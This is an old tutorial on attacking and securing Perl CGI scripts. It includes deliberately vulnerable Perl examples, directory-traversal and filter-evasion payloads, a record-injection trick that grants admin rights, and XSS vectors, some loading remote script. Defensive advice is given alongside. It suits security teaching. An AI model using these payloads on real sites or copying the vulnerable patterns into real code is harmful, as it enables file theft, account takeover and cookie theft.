Hacking CGI - Security and Exploitation

by b0iler :
Written for :
http://b0iler.eyeonsecurity.net/ - my site full of other cool tutorials
http://blacksun.box.sk/ - a legendary site full of original tutorials


last update May 5th 2002               

"Before I enter you to be victims of my stories, tales, lies, and exaggerations.."

Table Of Contents

INTRO
          -Useless babble


CGI SYNTAX
          -GET
          -POST
          -CGI
          -Cookies
          -ENV

PROBLEMS WITH PERL AS CGI
          -Reverse Directory Traversal
          -Flat Databases
          -Cross Site scripting
          -SSI
          -NULL Byte
          -Problems With open()
          -Perl Length Limits
          -System Commands
          -Evaluating User Input
          -Poor Input Filtering

EXAMPLES OF VULN SCRIPTS
          -Common CGI Exploits Project
          -Real Life Examples
          -perlaudit.pl - to help find your own holes

CONCLUSION
          -FAQ
          -Sources

I[ntro]


          Welcome, my name is b0iler and I will be your guide throughout this paper.  I hope you are ready and willing, as this next hour or so may get pretty ugly.  With introductions out of the way, I would like to state that this is not meant to be a full guide to perl security.  There are just too many different ways to exploit perl for one paper to cover.  This paper is meant to help people secure their perl when it is used as CGI: common programming security flaws, how to exploit them, how to prevent them, and a means for me to show people how sexy perl is.  It only tries to touch on the basics of common programming vulnerabilities.  This means I won't mention stuff like how you should run your scripts at reduced privileges or how you should have permissions set correctly on all files.  That is just too much for me to cover, and it has been covered well by many perl security tutorials.  This is a perl CGI paper, covering only common mistakes in people's code.

You must already know a little bit of perl before reading this.  Without a basic understanding of open(), subroutines, and regex you will be lost and I will just laugh at you.  But only the bare minimum is required.  If you have ever read Rain.Forest.Puppy's "Perl CGI problems" in Phrack #55 you will find that this tutorial borrows a lot from it, and many of the techniques used here are covered in that paper.  So why am I writing this? Because although that paper was brilliant, it doesn't cover many problems in CGI scripts and it is a very hard tutorial for a newbie to understand.  I will go a little more slowly in this tutorial and introduce many new problems I have found to be common in CGI scripts.  I plan on covering the basics of how many CGI scripts handle input and then covering a lot of the techniques used by attackers to exploit these CGI scripts.

CGI stands for Common Gateway Interface and is used on millions of sites worldwide.  It allows visitors of websites to issue commands on the remote server.  Plain old html is static and doesn't allow any processing by the server.  CGIs can completely customize a web site and give it a lot more power, control, and functionality.  CGI scripts are mostly coded in perl, and to exploit them you should at least know the basics of perl and the operating system it is being run on.  The more you know about the factors at play, the easier it will be to see the flaws in them.  So if you know a lot about http (esp headers), perl, and the operating system you will be good to go.  CGI scripts are run server side, which means a client (you) asks the server to run the script, the server runs the script and prints output to the client.  This also means that a CGI script is normally not a direct security concern for the client (you), cross site scripting being the exception, but it can be a big security concern for the server.  Many big sites with people dedicated to network security have had CGI scripts which let an attacker gain information (reading files: credit card databases, passwords, company secrets, etc.), write to files (adding to databases, defacing websites, adding access to services, changing configuration files, etc.), or even execute commands (all of the above and more!).

Don't be overwhelmed by this tutorial's size or difficulty.  This stuff took me a long time to learn.  Hours of experimenting, goofing off, auditing hundreds of scripts, and reading about perl were required in order for me to feel comfortable writing this.  If you can understand most of the ideas discussed in this tutorial in a month you are doing well.  Don't expect to read it once and know how to exploit perl.  I read RFP's tutorial at least a half dozen times before I understood every bit of it (learning more and more perl in between reads).  Keep this in mind while reading, and please read this paper more than once.

Just to state the obvious, this tutorial does have mistakes.  Take nothing I say too seriously and don't use my examples as a guide for proper perl coding.  They are probably full of syntax errors and typos.  Any time I mention a way of getting around something or doing something there is probably another way to do it, which fits perl's slogan (There's More Than One Way To Do It).  If I did miss something that is important email me at b0iler@hotmail.com

CGI Syntax


          First of all let me say that this is not a tutorial to learn CGI from.  If you do not know how to code CGI already then this tutorial might be a little too advanced for you.  If you don't know perl then close your web browser right now and buy a perl book.  If you are rusty with CGI, or have the basic concepts down it might be nice to read over a CGI tutorial or two before continuing.  This section will just be a brief overview of all the different ways users submit data to a CGI script.  If you already know perl well you may skip over this section, if not it might be a good idea to read it.  Maybe you'll learn something, or it might help keep the info fresh while you read the rest of the paper.

CGI usually requires some form of user input; without it there is almost no point in using a CGI script.  Perl was not built with CGI in mind, as the web had not even been created yet.  So things get a little hairy for people new to perl trying to pick up on how input is sent to the script.  Basically there is GET and POST.  These are the two main ways of getting data from the user.  There are also cookies and environment variables, which can hold useful information some scripts use to make decisions.


GET
          GET is the easiest to understand.  It is data sent in the URL.  You can see an example of this whenever you visit a script.cgi file with ?something at the end.  It is called GET because that is the method used in the HTTP request when your browser gets the file from the server (GET /cgi-bin/file.cgi HTTP/1.1).  Example: http://b0iler.eyeonsecurity.net/script.cgi?this_is_the_query_string  Everything after the ? is called the query string.  The webserver passes it to the script in $ENV{'QUERY_STRING'}, and it is often handled like this:
	#script.cgi?sometext  would make $file = 'sometext'
$file = $ENV{'QUERY_STRING'};

or when using multiple values:
	#script.cgi?some&text  would make $name = 'some' and $file = 'text'
($name, $file) = split(/&/, $ENV{'QUERY_STRING'});

or for a more advanced way put values in a hash:
	@pairs = split(/&/, $ENV{'QUERY_STRING'});
foreach $pair (@pairs){
($name, $value) = split(/=/, $pair);

#used to make + into spaces
$value =~ tr/+/ /;

#used to convert url encoding (hex) to ascii
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

$FORM{$name} = $value;
#script.cgi?name=some&file=text
#would make $FORM{'name'} = 'some' and $FORM{'file'} = 'text'
}
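
For anyone who wants to play with the hash version outside of a webserver, here is a minimal sketch of the same loop wrapped in a subroutine.  The name parse_query and the sample query string are my own inventions for illustration, not taken from any real script.  It also decodes the field names and keeps any extra = inside a value, two details the loop above skips.

```perl
use strict;
use warnings;

# Parse a raw query string such as "name=some&file=text" into a hash.
# parse_query is a hypothetical helper name used only for this sketch.
sub parse_query {
    my ($query) = @_;
    my %form;
    foreach my $pair (split /&/, $query) {
        next unless length $pair;                  # skip empty pairs ("a=1&&b=2")
        # a limit of 2 keeps any extra "=" inside the value
        my ($name, $value) = split /=/, $pair, 2;
        $value = '' unless defined $value;
        for ($name, $value) {
            tr/+/ /;                                    # "+" means space
            s/%([a-fA-F0-9]{2})/pack("C", hex($1))/eg;  # %2E becomes "."
        }
        $form{$name} = $value;
    }
    return %form;
}

my %FORM = parse_query('name=some&file=text%2Etxt&note=a+b');
print "$_ = $FORM{$_}\n" for sort keys %FORM;
```

Note that nothing in here checks what the values contain.  It only decodes them, which is exactly why the rest of this paper exists.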


Here is a simple example of a GET request.  It would be nice if you knew a little more about HTTP than what I'll explain in this tutorial.  In fact I am writing an intermediate tutorial on HTTP right after this one is finished.
	GET /script.cgi?some&text HTTP/1.0


The other basic way users input data is through POST, which sends the values in the body of the HTTP request instead of in the URL.  Relying on values sent from the client side is not secure; never think that just because you are using POST the data is any safer than with GET.



POST
          POST data comes from forms you fill out on webpages and is sent to the script on STDIN.  Some values sent to the script can be hidden; you normally cannot view or edit these values in a web browser, since it does not show the HTTP requests to the end user.  POST gets its name from the HTTP request method used (POST /cgi-bin/file.cgi HTTP/1.1).  Here is an example of an HTML form which would submit 'name' and 'file' data in a POST.
	<form action="script.cgi" method="post">
<input type="text" name="name" value="">
<input type="hidden" name="file" value="profiles.txt">
<input type=submit value="submit">
</form>

And this would be a commonly seen way to handle POST data.  All form fields are put into $FORM{'name-of-field'}
	#read POST data into $buffer
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
#used to make + into spaces
$value =~ tr/+/ /;
#used to convert url encoding (hex) to ascii
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
#this would set $FORM{'name'} = whatever the user put in the text field
#and $FORM{'file'} to profiles.txt
$FORM{$name} = $value;
}

This works kinda like GET, but you use read() to read STDIN, which carries the content of the POST request.  CONTENT_LENGTH tells the script how much to read; the client includes it in the POST request.  All this works a little bit differently than GET requests do, but the CGI module works the same for GET as it does for POST.  This makes it a little easier to remember and nicer to work with.  Many scripts rely on user submitted data to make decisions and take actions.  Sometimes the authors trust the user not to change hidden form data, such as changing
	<input type="hidden" name="file" value="profiles.txt">
to
<input type="hidden" name="file" value="/etc/passwd">

And then submitting the data.  As stated before, POST data is just sent with the HTTP request (as content).  This means you can very easily send these values yourself with a script or even just telnet.  An easy method for beginners is to get Proxomitron and edit hidden input fields.  This also means you can bypass any kind of client side security, such as javascript checks, the HTTP_REFERER value, or html (form values).  Never trust data coming from POST any more than you would data coming from GET or anywhere else; values can be very easily changed by attackers.  Read the HTTP RFC for more information on how exactly HTTP works, or get Proxomitron to change html client side.  I prefer learning and knowing things in depth, which means doing it by hand with telnet or a script I code and not with Proxomitron.  Here is a quick example of a POST request:
	POST /script.cgi HTTP/1.0
Content-Length: 23
Content-Type: application/x-www-form-urlencoded

value=blah&another=bleh
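
Since the fiddly part of doing this by hand is getting Content-Length right, here is a rough sketch of a script that builds such a request for you.  The sub names build_post and url_encode, the path, and the field values are all made up for illustration.  The sketch only builds the text of the request; actually sending it (with telnet, or a socket module such as IO::Socket::INET) is left out.

```perl
use strict;
use warnings;

# URL-encode everything except letters, digits and "_ . ~ -".
# Assumes plain single-byte input.
sub url_encode {
    my ($text) = @_;
    $text =~ s/([^A-Za-z0-9_.~-])/sprintf("%%%02X", ord($1))/eg;
    return $text;
}

# Build a raw HTTP/1.0 POST request from an ordered list of name/value pairs.
sub build_post {
    my ($path, @fields) = @_;
    my @pairs;
    while (my ($name, $value) = splice(@fields, 0, 2)) {
        push @pairs, url_encode($name) . '=' . url_encode($value);
    }
    my $body = join '&', @pairs;
    return "POST $path HTTP/1.0\r\n"
         . "Content-Type: application/x-www-form-urlencoded\r\n"
         . "Content-Length: " . length($body) . "\r\n"
         . "\r\n"
         . $body;
}

# The "hidden" file field is whatever we say it is.
print build_post('/script.cgi', name => 'b0iler', file => '/etc/passwd'), "\n";
```

The point of the design is that Content-Length is computed from the finished body, so the hidden field can be changed to anything without counting characters by hand.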

POST data is a bit harder to do by hand than GET, but by taking advantage of a programming language things can be made fairly simple with a bit of effort.  Receiving POST and GET data isn't very hard to do, but it is a lot easier to let the CGI module handle everything for you.  It also makes your code a little easier to read.


CGI
          There is also a very commonly used module for easily handling GET and POST data.  This is the CGI module, and is often used like this:
	use CGI;
#$value is a new CGI
$value=CGI->new();
$file = $value->param('file'); #script.cgi?name=some&file=text
$name = $value->param('name'); #would make $name = 'some' and $file = 'text'

I would recommend using the CGI module for your own scripts; it is easy to understand and works very well.  I hope you know enough perl to understand the above examples.  Let's move on to the other main types of user input.



Cookies
          Cookies are small bits of data which sites can put on your computer in order to help identify you or keep records of your visits.  Cookies can also be set by javascript or html meta tags.  But you should be aware that perl can set cookies (using the HTTP Set-Cookie header), and that data can be sent to a script in the form of cookies (in the Cookie header of HTTP requests, which the script sees as $ENV{'HTTP_COOKIE'}).  I will not bother with an example of how to set/read cookies.  Cookies aren't used quite as often as GET and POST, which are used in just about every CGI script.  If you want to learn, try looking into the CGI module and the details of how cookies work.



ENV
          As seen before with $ENV{'QUERY_STRING'} and $ENV{'CONTENT_LENGTH'}, the %ENV hash contains many useful variables that hold information about the script's environment.  Since some of these variables can be affected by user input, they need to be fully understood by anyone coding CGIs or trying to find vulnerabilities in CGIs.  Here is a short list of some of the ENV variables that are often abused or helpful in terms of security.

Of course QUERY_STRING is the most abused, but you would be surprised how often things like HTTP_USER_AGENT can be misused to cause the script to do something it shouldn't.  Most of the others on this list are there because they can help make the CGI more secure.  There are a lot more, but I won't bore you explaining some you will never use and that don't pertain to security at all.  Instead, do this to print out all the values in %ENV:
	while($ename = each(%ENV)){
print "$ename = $ENV{$ename}\n";
}
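
If dumping the whole hash is too noisy, a variation is to print only a handful of variables.  The selection below is my own pick of standard CGI variables, not a list taken from any particular script, and env_report is just a name I made up.  Keep in mind that everything starting with HTTP_ is copied from a request header the client sent, so the client controls it completely, while REMOTE_ADDR is filled in by the webserver from the connection itself.

```perl
use strict;
use warnings;

# Hypothetical selection of standard CGI variables worth looking at.
my @interesting = qw(
    REQUEST_METHOD QUERY_STRING CONTENT_LENGTH
    HTTP_USER_AGENT HTTP_REFERER HTTP_COOKIE
    REMOTE_ADDR
);

# Return one "NAME = value" line per variable, marking the ones that are unset.
sub env_report {
    my @lines;
    foreach my $name (@interesting) {
        my $value = defined $ENV{$name} ? $ENV{$name} : '(not set)';
        push @lines, "$name = $value";
    }
    return join("\n", @lines) . "\n";
}

print env_report();
```

Run from a shell, most of these will show up as not set.  Run as a CGI, they are filled in by the webserver for every request.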

This section was in no way detailed.  If you do not know how HTTP headers are sent you should spend some time researching this and other aspects of how CGIs work.  I just wanted to get you familiar with all the different ways users can send data to the script.  Now that we know how we are sending data to the scripts, let's see how we can abuse this privilege and prevent others from abusing our stuff.

Problems With Perl As CGI


          The reason I call this section "Problems With Perl As CGI" is that CGI scripts can be coded in pretty much any language, although they are commonly coded in Perl.  This is the most important part of this paper, so do not skip any sections.  Even if you think you know about a subject, I will be introducing some new techniques and ideas.



Reverse Directory Traversal
          We start our adventure into the realm of CGI vulnerabilities fairly simply.  If you know even the basics of the unix file system and a little bit of Perl you will be able to understand why this is a problem.  It is a very common vulnerability called "Reverse Directory Traversal", which means you can move to a directory which the script is not supposed to access (the reverse means going backwards: ../).  This can allow you to read, write, delete, execute, etc. files in a different directory than what was intended.  Here is your common open() call:
	open(FILE, "/home/user/file.txt");

Now the same exact thing but using a variable to determine which file to open:
	$this = '/home/user/file.txt';
open(FILE, "$this");

Both of these open the file /home/user/file.txt and neither of them is vulnerable at all.  They are safe from remote attacks.  Now what happens if $this is defined by user input?
	$this = $ENV{'QUERY_STRING'};      #gets the user input into $this
open(FILE, "$this"); #opens that file
@stuff = <FILE>; #puts contents of that file into @stuff array
close(FILE);

print "Content-type: text/html\n\n"; #print html to the client
print "<HTML><BODY>\n";
print @stuff;
print "</BODY></HTML>";

Now evil_attacker will make QUERY_STRING something like /etc/passwd, or any other file they would like to read on the server.  There is another way to get to directories you are not supposed to reach.  Let's say the author thought they would be safe if they put a hard coded directory before the inputted file.
	$this = '/home/user/';
$this .= $ENV{'QUERY_STRING'}; #appends the user input to the hard coded directory
open(FILE, "$this");

Now you can't simply put /etc/passwd, but you can use ../../etc/passwd =)  Most reverse directory traversal exploits will have many ../'s in them.  It is probably the most attempted exploit against unknown CGIs.  Attackers see script.cgi?file=database.txt and they immediately try script.cgi?file=../../../../etc/passwd.  So what if the script has the following for protection against reverse directory traversal:
	$this = '/home/user/';
$this .= $ENV{'QUERY_STRING'}; #appends the user input to the hard coded directory
$this =~ s/\.\.\///g; #gets rid of ../ in $this
open(FILE, "$this");

This looks safe.  But if we know enough about unix and perl regex we can see a flaw.  That is .\./.\./etc/passwd =)  In a unix shell the backslash just escapes the next character, so .\./ means the same as ../ whenever the file name ends up being handed to a shell.  If an attacker inputs .\./.\./file the regex "protection" will not see ../ in the string and will not filter it.  So you are thinking "just s/\\//g as well".  Let's look at the following:
	s~\\~~g;     #or  s/\\//g;
s~\.\./~~g; #or  s/\.\.\///g;

That gets rid of ../ and .\./ very well.  To the perl coder who isn't security aware the task is complete: they have filtered these two types of reverse directory traversal.  Real security programmers should always be thinking of possible ways users can evade the filters and do things which weren't meant to be done.  So let's really look at what these two filters are doing.  They are removing '../' and '\' from a string.  So something like 'f\ilter\ed' would become 'filtered'.  And '.../...//' would become '../'  Oh no =)  This is a very exploitable filter that tons of CGI scripts use.  Even some "secure" scripts and programmers use these types of filters and never think twice about their security.  I will discuss this method of evading filters later.
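
If you don't believe a filter can manufacture the very string it removes, here is a small sketch you can run yourself.  The sub name naive_filter is mine; the two substitutions inside it are the ones shown above, applied in the same order.

```perl
use strict;
use warnings;

# The two "cleanup" substitutions discussed above, applied in the same order.
sub naive_filter {
    my ($path) = @_;
    $path =~ s/\\//g;        # remove every backslash
    $path =~ s/\.\.\///g;    # remove every "../"
    return $path;
}

foreach my $input ('../../etc/passwd', '.\./.\./etc/passwd', '.../...//etc/passwd') {
    printf "%-22s -> %s\n", $input, naive_filter($input);
}
```

The first two inputs come out harmless.  The third one goes in without a single clean ../ and comes out with one, because each removal glues the leftover dots and slash together.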

So how can you stop attackers from reading/writing to any file on your system?  First make sure all key files are chmod'd correctly! There are webhosts out there that have files default to 777! With permissions like that anyone can use a CGI script to read/write any file or directory.  You need to at least set the permissions of the index of your site and all scripts and databases so that nobody abusing a CGI script can write to them.  On linux ext2 I'd suggest the chattr command.  In fact, any index.html that isn't updated often should be chattr'd and be owned by a user with higher privileges than nobody or www.  Also create index.html, index.shtml, index.cgi, index.htm and any other possible extensions.  This will stop defacers from just creating an index with a different file extension which the webserver would pick as the default before yours.  That was just a VERY brief warning to you webmasters out there, but file permissions are a very key part of CGI exploitation.  I won't really cover any more about them other than to say: make sure CGI has as few permissions as possible, and only give files which NEED to be accessed by CGI scripts permissions low enough to be read/written by nobody.

/me slaps b0iler with a "stay on topic for dummies" book

To actually secure your scripts you need a good input subroutine.  Don't just accept user input, don't just filter user input, deny user input! Way too many scripts try to correct user input instead of denying it.  This is a great problem.  Even security professionals make mistakes with regex.  Another thing is that sometimes perl coders forget to filter a certain meta character.  The meta characters are: &;`'\"|*?~<>^()[]{}$\n\r and they need to be filtered very carefully if you are using s///.  Here is an example from a script I recently looked at:
	$filename =~ s/([\&;\`'\|\"*\?\~\^\(\)\[\]\{\}\$\n\r])/\\$1/g;
$filename =~ s/\0//g;
unless (open(FILE, $filename))

If you look closely you'll notice they forgot to filter out \, so when you enter something like $filename = 'touch afile.txt\|' it will turn out as 'touch afile.txt\\|', which means the \ that is used to escape the meta characters is escaped instead of the |.  This error is also in a few perl security papers, so it is fairly widespread in scripts.  Again, in case you didn't understand: to exploit this filter you escape their escape on your meta character.  So if $filename = '/bin/echo "haha" > file.txt|' it would become '/bin/echo \"haha\" > file.txt\|', which would not work.  So try $filename = '/bin/echo "haha" > file.txt > blah\|', which will become '/bin/echo \"haha\" > file.txt > blah\\|'.  Now the \ that the script is escaping your | with is itself the character being escaped.  There are many more examples of regex not filtering properly.  I will discuss these more in depth later.  I say unless you have to filter input (which shouldn't be very often), don't.  Instead, if the user submitted something they shouldn't, the script should stop right there.  Don't try to correct the problem.  For instance, if someone is inputting a pipe | into the script they are doing something wrong, probably trying to hack it.  So why correct this? Just tell them "illegal characters detected" and stop.  This makes things such as the two regex problems listed above much more pain free and makes the check less likely to be circumvented.  Here is an example of this:
	if($file =~ /[\&;\`'\|\"*\?\~\^\(\)\[\]\{\}\$]/) {
&ErrorPageAndLog('illegal characters detected.. you have been logged');
}

This way, even if you did forget the \, another meta character will be spotted and the error page will be produced anyway.  To check for \ as well, just add a \\ in there.  Now that your eyes are bleeding from regex, let's continue to a less hairy problem in perl scripts =)
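
One last bit of regex for those who want to watch the escape-the-escape trick happen.  This is only a sketch: flawed_escape wraps the two substitutions quoted from that script, and has_meta is my own take on the deny approach with \, <, > and the null byte added to the list.  Both sub names are made up.

```perl
use strict;
use warnings;

# The escaping filter quoted above: a backslash is put in front of each listed
# meta character, but the backslash itself is missing from the list.
sub flawed_escape {
    my ($filename) = @_;
    $filename =~ s/([\&;\`'\|\"*\?\~\^\(\)\[\]\{\}\$\n\r])/\\$1/g;
    $filename =~ s/\0//g;
    return $filename;
}

# Denying instead: true if the input contains any meta character, "\" included.
sub has_meta {
    my ($filename) = @_;
    return $filename =~ /[\\\&;\`'\|\"*\?\~\^\(\)\[\]\{\}\$\n\r\0<>]/ ? 1 : 0;
}

foreach my $input ('touch afile.txt|', 'touch afile.txt\|') {
    printf "%-20s escaped: %-22s denied: %s\n",
        $input, flawed_escape($input), has_meta($input) ? 'yes' : 'no';
}
```

In the second line of output the pipe is preceded by two backslashes, so the first one escapes the second and the pipe is live again.  The deny check does not care how the characters are arranged; it refuses both inputs.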



Flat Databases
          When I talk about flat databases I am talking about plain text files used to store data.  This could be database.txt, database, file.db, or any number of others.  Basically there are two major problems with using flat databases.  The first one we will cover is a perl problem, the second is a misconfiguration problem.

Flat databases need to use something to break up the input.  For instance, if a message board script puts a user's name, email address, and message into messages.txt it will need to somehow keep that data separate when it reads it back.  It's better explained with an example =)
	use CGI;
#$input is a new cgi
$input=CGI->new();
#get GET/POST variables
$name = $input->param('name');
$mail = $input->param('mail');
$message = $input->param('message');

#print to messages database
open(DB, ">>messages.txt");
print DB "$name|$mail|$message\n";
close(DB);

This will put the 3 inputted variables into messages.txt, each one separated by a |.  When the message board script goes to read the messages this is what the code will look like:
	#read messages database
open(DB, "<messages.txt");
@messages = <DB>;
close(DB);

#print html
print "Content-type: text/html\n\n";
print "<HTML><BODY>\n";

#loop through all the messages
foreach $msg (@messages){
#split the database fields up
($name, $mail, $message) = split(/\|/, $msg);
print "message by: <a href=\"mailto:$mail\">$name</a>\n";
print "<br><br>\n$message\n<br><br>\n";
}
print "</BODY></HTML>";

The problem in this should jump out to any attacker, even if it isn't too big a deal in this example.  No user input is filtered or denied whatsoever.  And since each variable is separated by a | and each post is on its own line, you can submit things like flood|flood|flood\nflood|flood|flood\nflood|flood|flood\nflood|flood|flood\n (with each \n sent as a real line break, %0a when URL encoded) to post hundreds/thousands of messages.

With a message board this isn't the biggest threat, but let's take another example.  This is a script I found that stores username|password|visits|user-agent|admin|ipaddress, where the admin field is 1 if the user is an admin and 0 if they are a normal user.  So what happens when input isn't filtered and someone signs up with the username b0iler|a|1|linux|1|127.0.0.1|\nfake ?  That's right..  it sets their username as b0iler, password as a, visits to 1, user-agent to linux, *admin to 1*, and ip address to 127.0.0.1, then does a line break and prints fake (which will be another username ;).  Now I have admin to the script.  It might go without saying, but scripts often assume that their admin can be trusted with input.  I've seen a few dozen scripts which secure all normal input but have multiple insecurities in the admin section, ranging from path disclosure to full blown command execution.  Also, if you can find out things like the admin's password to the script or to .htaccess protected areas, chances are that they use the same password for the site's ftp/ssh/telnet.  Admins, use different passwords for everything.  Users too, since you can't trust admins not to try your passwords on your email accounts and such.  I've heard of someone getting rooted this way: signing up for a site and using their root password there.
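
Here is a rough sketch of that signup trick, plus the kind of check that stops it.  The field layout comes from the script described above, but the code itself, the sub names make_record and field_ok, and all the sample values are my own reconstruction for illustration, not the real script.

```perl
use strict;
use warnings;

# Build one record the way the vulnerable script does: no checks at all.
# New users start with 0 visits and admin set to 0.
sub make_record {
    my ($username, $password, $agent, $ip) = @_;
    return join('|', $username, $password, 0, $agent, 0, $ip) . "\n";
}

# Deny (rather than clean) any field holding the delimiter or a line break.
sub field_ok {
    my ($field) = @_;
    return $field !~ /[|\r\n]/ ? 1 : 0;
}

my $evil = "b0iler|a|1|linux|1|127.0.0.1|\nfake";
my $db   = make_record($evil, 'secret', 'Mozilla', '10.0.0.5');

# Read the "database" back the way the script would.
foreach my $line (split /\n/, $db) {
    my ($user, $pass, $visits, $ua, $admin, $ip) = split /\|/, $line;
    print "user=$user admin=$admin\n";
}
print "field_ok says: ", (field_ok($evil) ? "accept" : "deny"), "\n";
```

One signup turns into two records, and the first one has admin set to 1.  Calling something like field_ok on every value before it is written (http headers included) would have refused the input outright.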

Many scripts will filter inputted usernames, passwords, and other form variables, but they don't even look at user-agent, referrer, or any other http headers which get printed to the database! Make sure to filter these if you use them in the database or to make any decisions.  Also try to use just one character for the delimiter; if you use two, certain filtering situations can come up which lead to evasion of your delimiter filter (see the filtering user input section for more details).

The other problem I see with flat databases is that the webserver is misconfigured to allow clients to read the databases!  This means all you have to do is go to http://b0iler.eyeonsecurity.net/cgi-bin/admin/database.txt to see the database.  This applies to other file extensions besides just .txt; pretty much anything not defined in the apache configuration as something different is downloadable.  There are several ways to fix this.  Two simple ones are to create this .htaccess and put it in the directory with the database.txt file:
	<Files "database.txt">
order deny,allow
deny from all
</Files>

or you could name the database file database.cgi so that when a client requests it the webserver tries to run it through perl first.  That fails, and the client gets an error 500 page instead of the contents of the file.  There was a problem with older php scripts using .inc for includes, which held sensitive information and could be read by clients.  So people switched to naming includes .php so they are run through php and not displayed.  But this also introduces a new problem..  now php programmers need to be aware that their includes can be called directly and will be parsed by the server.  (Sometimes an include trusts that the script including it will have done something already, or that the data it is handed is safe.  Enough about php.)

You could also give the database a name starting with .ht, since the default apache configuration refuses to serve such files to the web.  Or you could just not put the database in a web readable directory.  For example if the website's root directory is /home/b0iler.eyeonsecurity.net/public_html/ then put the database in /home/b0iler.eyeonsecurity.net/

There is also the problem of vulnerabilities in other scripts or services running on the box which would allow an attacker to read this plain text file.  Using mysql or any other database which requires a valid login and password would prevent this sort of thing from happening.  Although I stress that sql is not always the answer; if you are just going to read all of the data then sql is just a waste.  It is meant to speed up sorting/finding small bits of data in a large collection.  SQL has a lot of power, and with this power comes the possibility of exploitation.  When unfiltered user input ends up inside a query, the vulnerability is called SQL injection, since you are injecting SQL into the SQL query.  This attack is normally very easy to do and requires minimal SQL knowledge or testing.  Not a whole lot of perl scripts use SQL, but a ton of php scripts do.  I may decide to add an SQL injection section to this tutorial at a later date, but for now read some sql security/exploitation papers ( http://www.ngssoftware.com/papers/advanced_sql_injection.pdf ).



Cross Site scripting
          Cross Site scripting refers to being able to run script on a client's machine as if it came from a site.  Not your own site of course, and the script shouldn't normally be there.  Most commonly it is user input that is printed back to the client, but it can come in other forms.  You might also see it called CSS, which I feel is pretty bad since people confuse it with Cascading Style Sheets, so XSS is what I'll call it from now on.  XSS isn't really a very dangerous problem in most situations, but as I discussed in detail in my hacking with javascript tutorial it can be a security concern for sites which store information in cookies.  I don't even really consider it much of an exploit unless the script uses cookies to identify a user or users can do things once logged in.  In a script I recently found, admin usernames and passwords are stored in cookies and the admin can log in with just a cookie.  There you could perform a cross site scripting attack against the admin of that site, get his cookie, and then have complete control over the script.  I also found a command execution hole in the admin part of that script, so once you have the admin cookie you can execute commands.

Here is an example to better show what XSS is and how it works.
	http://b0iler.com/script.cgi?display=<script type=text/javascript>alert('hello');</script>

Script.cgi is a perl script that will display the inputted text somewhere on the html page it outputs to the client (the user's browser).  This means the <script type=text/javascript>alert('hello');</script> will get run by the web browser as if it came from that domain.  It therefore has access to cookies and other goodies.  The other goodies include the current url, which can contain usernames, passwords, session ids, and other sensitive info.  The injected script can redirect users to another script on that site or submit data to a script which could do things such as delete email, send email, add an admin to the database, steal credit card numbers, and virtually anything that a user can do once logged in.

The scripts most commonly vulnerable to cross site scripting are shopping cart scripts and web email scripts, since they require a user to log in and take actions depending on what data the user submits.  Web email scripts also have the nice feature that you can simply send the victim an email with javascript in it to read/delete/send email and change the user's password.  I found this out with a large script I audited a while ago.

It's hard to point out exactly how to find cross site scripting vulns.  But basically just look for any user inputted data that is printed directly to the client without any filtering.  Also things like message boards that don't filter html can have posts with scripting in them.  Here is a very simple (and common) cross site scripting problem:
	use CGI;
#$input is a new CGI
$input=CGI->new();
$email = $input->param('email');
#checks for valid email address: something@something.com
if($email !~ /^(\S+)\@(\S+)\.(\S+)/){
#prints $email to html, totally unfiltered.
&printhtml("error: $email is not a valid email address");
}
else{ &processemail("$email"); }

Now if you input something like <script type=text/javascript>alert('hello');</script> as your email address, the error message will be printed to the client and the javascript will be run by the browser.  The most common cross site scripting attacks focus on redirecting the user to a script that does something (send email), stealing cookies, or submitting form data automatically.

Stopping XSS is not very easy.  You can filter for & ; # ( ) < and >.  Filtering for things like /, :, and 'javascript', and escaping ' and ", isn't too bad an idea either.  But javascript can build strings even without ' or ", so do not trust any of this filtering 100%.
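
As one possible way to handle the < > & ' and " part, here is a sketch that turns those characters into html entities right before printing, instead of stripping them.  This is output encoding, a related technique I am swapping in for illustration rather than a filter described in this paper, and html_escape is a made up name.  It only helps for text that lands between tags or inside a quoted attribute value.  It does nothing for input printed inside a script block or used as a url.

```perl
use strict;
use warnings;

# Replace the characters html treats specially with their entities.
# "&" has to go first so the entities added afterwards are not re-encoded.
sub html_escape {
    my ($text) = @_;
    $text =~ s/&/&amp;/g;
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    $text =~ s/"/&quot;/g;
    $text =~ s/'/&#39;/g;
    return $text;
}

my $email = q{<script type=text/javascript>alert('hello');</script>};
print "error: ", html_escape($email), " is not a valid email address\n";
```

The browser will now show the script tag as text instead of running it.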

Filtering for the string 'script' will not work; there is special encoding for html which can evade this type of filtering.  Many scripts which allow some form of html try to block script and disallow 'onload', 'onclick', 'onmouseover', and other events which can execute javascript.  This is extremely hard to do.  It would be nice if there was an html tag you could use to make the browser not parse any scripting.  Since there isn't, you must go through the pain of filtering or blocking all possible ways to insert javascript.  I would say to allow a very minimal group of characters.  For example only allow input to contain A-Za-z0-9.  Nothing else.  Once you try to filter out only the bad strings you are left with all sorts of possible ways to evade the filters and still print javascript.  One way is that the attacker could just include the source of the script with src.  Some examples of this are:
	<script src="http://b0iler.eyeonsecurity.net/nasty.js"></script>
<layer src="http://b0iler.eyeonsecurity.net/nasty.js"></layer>
<ilayer src="http://b0iler.eyeonsecurity.net/nasty.js"></ilayer>
<style type=text/css>@import url(http://b0iler.eyeonsecurity.net/nasty.js);</style>
<link rel=stylesheet type="text/javascript" SRC="http://b0iler.eyeonsecurity.net/nasty.js">

As you can see, some of these don't even contain the string 'script' in any way.  There are many other ways of inserting javascript, and there are certain ways for each browser that only work for that browser.  So stopping them all is almost hopeless.  In case you run into a script which tries to filter every way of adding javascript, here are a few more ways which can often get by filters (there are also the frame, applet, object, and embed tags, and more):
	<img src="javas
cript:alert('xss');"> - line breaks and spaces can be used to evade filters.

&{alert('XSS')}; - works for netscape 4.x and can be used in many tags: <br size="&{alert('XSS')}">

<style type="text/javascript">alert('XSS');</style> - using style tag instead of script.

Of course there are even more ways javascript can be put in seemingly innocent tags, by way of on* events, css, or others:
	<img src="javascript:alert('XSS');"> - javascript in an img tag
<body onload="alert('script')"> - javascript in an onload event (there are other on* events).
<p style="left:expression(eval('alert(\'XSS\')'))"> - css in a p tag

